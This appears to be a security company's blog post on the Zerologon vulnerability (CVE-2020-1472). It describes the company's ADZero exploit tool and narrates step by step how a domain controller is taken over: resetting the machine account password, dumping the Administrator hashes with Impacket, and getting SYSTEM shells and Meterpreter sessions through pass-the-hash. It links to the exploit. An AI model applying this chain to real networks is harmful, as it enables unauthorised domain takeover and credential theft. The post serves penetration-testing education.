Privia Security was chosen as one of Türkiye's fastest growing companies!
Privia Security was chosen as one of Türkiye's fastest growing companies!
In August 2020, a security vulnerability with the code CVE-2020-1472 was disclosed — one for which Microsoft had released a patch and which directly affects the Domain Controller machine in an Active Directory environment. The CVSS score of the vulnerability, named Zerologon, was stated as 10 out of 10. An attacker exploiting the Zerologon vulnerability can access the Domain Controller machine without authentication, obtain elevated privileges, and carry out critical operations.
The Zerologon vulnerability stems from a cryptographic flaw whereby encrypting a plain text consisting of null bytes for 1 in every 256 randomly generated keys results in a cipher text also consisting of null bytes. The vulnerable encryption protocol is applied in place of the authentication mechanism in the Netlogon protocol.
The Netlogon Remote (MS-NRPC) protocol is used in Active Directory environments for workstations and servers to communicate with the Domain Controller machine over a secure channel. Netlogon holds a computer account whose password is known to every workstation or server that has joined Active Directory. Active Directory has several keys derived from the same password that can be used in authentication protocols such as Kerberos and NTLM.
The Zerologon attack causes the password of the computer account on the Domain Controller machine in the domain environment to be set to an empty string value in Active Directory, and the reset computer account credentials to be verified by the Domain Controller machine.
The Domain Controller performs the authentication operation with elevated privileges, because the Domain Controller can use the DRSUAPI protocol to synchronise Active Directory data, including NT hash values and Kerberos keys. Once NT hash values and Kerberos keys are obtained, the attacker can impersonate any user in the domain or create forged Kerberos tickets.
When the Domain Controller computer account password is reset in Active Directory and the Domain Controller is then restarted, various services will fail to start when they try to read information from Active Directory. This is because the encrypted computer account password stored in the Domain Controller registry and in the memory of lsass.exe is not changed. To prevent this from occurring, during penetration tests, after Domain Controller machines containing the Zerologon vulnerability have been compromised, the password of the computer account whose password was reset in Active Directory must be corrected.
The exploit module published for the Zerologon security vulnerability with the code CVE-2020-1472 was optimised by the Privia Security team and a tool named ADZero was developed. The ADZero tool enables a shell session with NT AUTHORITY\SYSTEM privileges to be obtained on a Domain Controller machine containing the Zerologon vulnerability. Figure 1 shows the usage instructions for the ADZero tool.
Figure 1 shows that the ADZero tool only requires the IP address of the Domain Controller machine. The published Zerologon exploit module requests an IP address, DC name, and computer account information on the DC from the user.
The ADZero tool submits an SMB Login request to the Domain Controller machine using the IP address it receives. The code relating to the SMB Login request is shown in Figure 2.
In Figure 2, the Domain Controller machine name and domain name are obtained from the response to the SMB Login request. The exploit module is run using the Domain Controller machine name, IP address, and the DC computer account formed by appending the ‘$’ symbol to the end of the DC machine name.
In Figure 3, the ADZero tool has been run against the IP address 172.16.5.105.
Figure 3 shows that the Zerologon attack against IP address 172.16.5.105 was carried out successfully. As a result, the Domain Controller computer account password is set to an empty string value (NT hash = 31d6cfe0d16ae931b73c59d7e0c089c0).
After the Domain Controller computer account password has been set to an empty string value, the secretdump.py module from the Impacket modules is used to save the Administrator user’s LM:NTLM hash information to a file named out. The smbexec.py module from the Impacket modules is then used to obtain a shell from the Domain Controller machine using the Administrator user’s LM:NTLM hash information. The technique of obtaining a session on the target machine using LM:NTLM hash information is called Pass-the-Hash. Figure 4 shows the shell session.
Figure 4 shows that the shell session was obtained with NT AUTHORITY\SYSTEM privileges.
In addition, a Meterpreter session can be obtained using the LM:NTLM hash value inside the out file obtained via the ADZero tool.
In Figure 5, the contents of the out file have been displayed using the cat command.
Figure 5 shows the LM:NTLM hash information belonging to the Administrator user contained in the out file. The psexec exploit module within the Metasploit Framework tool can be used to obtain a Meterpreter session on the Domain Controller machine.
Figure 6 shows the use of the psexec module.
Figure 6 shows the obtained LM:NTLM hash information being used in the exploit/windows/smb/psexec exploit module within the Metasploit Framework. Running the exploit module yields a Meterpreter session.
Figure 7 shows the exploit module being run and the Meterpreter session being obtained.
Figure 7 shows that the Meterpreter session was obtained with NT AUTHORITY\SYSTEM privileges.
ADZero – Zerologon Exploit Tool: https://github.com/Privia-Security/ADZero
You May Be Interested In These
